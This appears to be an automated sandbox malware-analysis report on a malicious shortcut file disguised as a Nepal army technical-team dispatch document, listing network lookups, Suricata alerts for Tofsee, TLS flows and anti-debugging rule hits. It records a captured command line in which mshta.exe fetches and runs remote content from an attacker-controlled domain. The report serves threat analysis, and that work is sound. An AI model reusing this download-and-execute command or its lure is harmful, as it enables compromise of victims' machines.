Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | June 15, 2024, 8:10 a.m. | June 15, 2024, 8:12 a.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
mailnepalarmymil.mods.email | 91.223.208.175 | |
x1.i.lencr.org | 23.52.33.11 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49164 -> 91.223.208.175:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49169 -> 91.223.208.175:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49164 91.223.208.175:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.mods.email | b8:66:ff:f2:98:5b:cd:cf:73:a4:d4:6b:9c:dd:ac:4f:a6:55:f0:cc |
TLSv1 192.168.56.103:49169 91.223.208.175:443 |
None | None | None |
request | GET http://x1.i.lencr.org/ |
request | GET https://mailnepalarmymil.mods.email/dispachofapc-46703841?yui=0 |
file | C:\Users\test22\AppData\Local\Temp\Dispatch of the APC HMLTV technical team.jpg.lnk |
cmdline | "C:\Windows\System32\mshta.exe" "https://mailnepalarmymil.mods.email/dispachofapc-46703841?yui=0" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |